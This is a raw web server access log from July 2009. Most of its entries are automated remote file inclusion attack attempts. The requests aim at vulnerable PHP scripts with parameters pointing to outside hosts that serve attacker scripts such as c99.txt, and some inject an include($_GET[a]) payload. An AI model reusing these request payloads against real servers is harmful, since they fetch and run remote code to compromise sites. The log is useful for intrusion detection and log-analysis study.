83.16.182.130 - - [20/Jul/2009:03:35:23 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
83.16.182.130 - - [20/Jul/2009:03:35:23 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
195.186.64.207 - - [20/Jul/2009:03:36:19 -0400] "GET /logs/access_log.Q109051200%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:36:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.242.98.70 - - [20/Jul/2009:03:36:28 -0400] "GET /logs/access_log.Q109071500%20%20///bbs/skin/ggambo7002_board/ask_password.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:36:28 -0400] "GET /logs///bbs/skin/ggambo7002_board/ask_password.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:36:28 -0400] "GET ///bbs/skin/ggambo7002_board/ask_password.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:36:40 -0400] "GET /logs/access_log.Q109071500///bbs/skin/ggambo7002_board/zboard.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:36:40 -0400] "GET /logs///bbs/skin/ggambo7002_board/zboard.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:36:40 -0400] "GET ///bbs/skin/ggambo7002_board/zboard.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:37:08 -0400] "GET /logs/access_log.Q109070800%20%20///bbs/skin/ggambo7002_board/ask_password.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:37:32 -0400] "GET /logs/access_log.Q109070800///bbs/skin/ggambo7002_board/zboard.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:37:51 -0400] "GET ///bbs/skin/ggambo7002_board/intro.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:37:51 -0400] "GET /logs/access_log.Q109071500///bbs/skin/ggambo7002_board/intro.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:37:51 -0400] "GET /logs///bbs/skin/ggambo7002_board/intro.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:38:00 -0400] "GET /logs/access_log.Q109051200%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:38:12 -0400] "GET /logs/access_log.Q109071500%20%20///bbs/skin/ggambo7002_board/zboard.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:38:14 -0400] "GET /logs/access_log.Q109071500///bbs/skin/ggambo7002_board/ask_password.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:38:30 -0400] "GET /logs/access_log.Q109070800%20%20///bbs/skin/ggambo7002_board/zboard.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.55.179.121 - - [20/Jul/2009:03:38:33 -0400] "GET //?_zb_path=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.55.179.121 - - [20/Jul/2009:03:38:33 -0400] "GET /logs//?_zb_path=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
72.55.179.121 - - [20/Jul/2009:03:38:35 -0400] "GET //?_zb_path=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.55.179.121 - - [20/Jul/2009:03:38:35 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.55.179.121 - - [20/Jul/2009:03:38:35 -0400] "GET /logs//?_zb_path=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
72.55.179.121 - - [20/Jul/2009:03:38:37 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.68.247 - - [20/Jul/2009:03:38:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L017D6C4C40F4A200EC41031+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.242.98.70 - - [20/Jul/2009:03:38:40 -0400] "GET /logs/access_log.Q109070800///bbs/skin/ggambo7002_board/ask_password.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:38:46 -0400] "GET /logs/access_log.Q109070800///bbs/skin/ggambo7002_board/intro.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.204.51.161 - - [20/Jul/2009:03:39:03 -0400] "GET /errors.php?error=http://www.robertobirindelli.com.br/adm/scripts/c99.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
190.128.251.111 - - [20/Jul/2009:03:39:22 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=http://ciudad.latinol.com/susan09/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
190.128.251.111 - - [20/Jul/2009:03:39:22 -0400] "GET /logs/index.php?pagina=http://ciudad.latinol.com/susan09/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.823"
190.128.251.111 - - [20/Jul/2009:03:39:22 -0400] "GET /index.php?pagina=http://ciudad.latinol.com/susan09/id.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.823"
87.242.98.70 - - [20/Jul/2009:03:39:23 -0400] "GET ///bbs/skin/ggambo7002_board/news.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:39:23 -0400] "GET /logs/access_log.Q109071500///bbs/skin/ggambo7002_board/news.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:39:23 -0400] "GET /logs///bbs/skin/ggambo7002_board/news.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:39:23 -0400] "GET /logs/access_log.Q109071500%20%20///bbs/skin/ggambo7002_board/intro.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:39:31 -0400] "GET ///bbs/skin/ggambo7002_board/links.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:39:31 -0400] "GET /logs///bbs/skin/ggambo7002_board/links.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:39:31 -0400] "GET /logs/access_log.Q109071500///bbs/skin/ggambo7002_board/links.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:39:44 -0400] "GET /logs/access_log.Q109070800%20%20///bbs/skin/ggambo7002_board/intro.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
190.128.251.111 - - [20/Jul/2009:03:39:45 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=http://ciudad.latinol.com/susan09/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
87.242.98.70 - - [20/Jul/2009:03:40:05 -0400] "GET /logs///bbs/skin/ggambo7002_board/errors.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:40:05 -0400] "GET ///bbs/skin/ggambo7002_board/errors.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:40:05 -0400] "GET /logs/access_log.Q109071500///bbs/skin/ggambo7002_board/errors.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:40:14 -0400] "GET /logs/access_log.Q109070800///bbs/skin/ggambo7002_board/news.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:40:30 -0400] "GET /logs/access_log.Q109070800///bbs/skin/ggambo7002_board/links.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:40:50 -0400] "GET /logs/access_log.Q109071500%20%20///bbs/skin/ggambo7002_board/news.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:40:52 -0400] "GET /logs/access_log.Q109070800///bbs/skin/ggambo7002_board/errors.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:41:11 -0400] "GET /logs/access_log.Q109070800%20%20///bbs/skin/ggambo7002_board/news.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:41:12 -0400] "GET /logs/access_log.Q109071500%20%20///bbs/skin/ggambo7002_board/links.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
70.86.9.234 - - [20/Jul/2009:03:41:17 -0400] "GET /logs/access_log.Q109051600//view.php?site_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
70.86.9.234 - - [20/Jul/2009:03:41:17 -0400] "GET //view.php?site_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 207 "-" "libwww-perl/5.811"
70.86.9.234 - - [20/Jul/2009:03:41:17 -0400] "GET /logs//view.php?site_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 212 "-" "libwww-perl/5.811"
87.242.98.70 - - [20/Jul/2009:03:41:20 -0400] "GET /logs/access_log.Q109071500%20%20///bbs/skin/ggambo7002_board/errors.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:41:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.242.98.70 - - [20/Jul/2009:03:41:31 -0400] "GET /logs/access_log.Q109070800%20%20///bbs/skin/ggambo7002_board/links.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:03:41:42 -0400] "GET /logs/access_log.Q109070800%20%20///bbs/skin/ggambo7002_board/errors.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:03:42:10 -0400] "GET /logs/access_log.Q109051800/index.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.232.54.48 - - [20/Jul/2009:03:42:10 -0400] "GET /logs/index.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
124.0.139.129 - - [20/Jul/2009:03:42:56 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:42:56 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:42:56 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:03:43:08 -0400] "GET /logs/access_log.Q109052200/index.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
124.0.139.129 - - [20/Jul/2009:03:43:10 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:43:19 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:43:19 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:43:19 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:43:38 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.189.18.73 - - [20/Jul/2009:03:43:47 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [20/Jul/2009:03:43:47 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.18.73 - - [20/Jul/2009:03:44:06 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.189.18.73 - - [20/Jul/2009:03:44:08 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.18.73 - - [20/Jul/2009:03:44:08 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [20/Jul/2009:03:44:21 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.109 - - [20/Jul/2009:03:45:04 -0400] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
114.200.199.109 - - [20/Jul/2009:03:45:04 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
114.200.199.109 - - [20/Jul/2009:03:45:04 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
114.200.199.109 - - [20/Jul/2009:03:45:04 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
114.200.199.109 - - [20/Jul/2009:03:45:04 -0400] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
114.200.199.109 - - [20/Jul/2009:03:45:04 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
114.200.199.109 - - [20/Jul/2009:03:45:21 -0400] "GET /logs/access_log.Q109062300//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
114.200.199.109 - - [20/Jul/2009:03:45:23 -0400] "GET /logs/access_log.Q109062300//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
124.0.139.129 - - [20/Jul/2009:03:45:25 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:45:32 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:45:48 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:03:45:48 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:03:45:48 -0400] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:03:45:49 -0400] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.weatherfiles.com//wp-content/plugins/mygallery/myfunctions/cmss/yes.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:03:45:49 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.weatherfiles.com//wp-content/plugins/mygallery/myfunctions/cmss/yes.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:03:45:50 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.weatherfiles.com//wp-content/plugins/mygallery/myfunctions/cmss/yes.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:03:46:01 -0400] "GET /logs/access_log.Q109062300//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.weatherfiles.com//wp-content/plugins/mygallery/myfunctions/cmss/yes.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:03:46:01 -0400] "GET /logs/access_log.Q109062300//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
124.0.139.129 - - [20/Jul/2009:03:46:16 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:46:23 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:46:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [20/Jul/2009:03:46:37 -0400] "GET /logs/access_log.Q109061700//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.189.18.73 - - [20/Jul/2009:03:46:47 -0400] "GET /logs/access_log.Q109061700//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:22 -0400] "GET /logs/access_log.Q109052600%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:22 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:22 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:22 -0400] "GET /logs/access_log.Q109051200%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:39 -0400] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:39 -0400] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:39 -0400] "GET /logs/access_log.Q109052600%20%20//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:39 -0400] "GET /logs/access_log.Q109051200%20%20//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:41 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:41 -0400] "GET /logs/access_log.Q109052600%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:41 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:48:45 -0400] "GET /logs/access_log.Q109051200%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
213.8.115.172 - - [20/Jul/2009:03:49:28 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dealio Toolbar 3.4; .NET CLR 2.0.50727)"
212.97.132.151 - - [20/Jul/2009:03:50:17 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
61.78.62.84 - - [20/Jul/2009:03:50:22 -0400] "GET /logs/access_log.Q109061300//contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:50:23 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:50:23 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:50:43 -0400] "GET /logs/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:50:43 -0400] "GET /errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:50:43 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:51:08 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
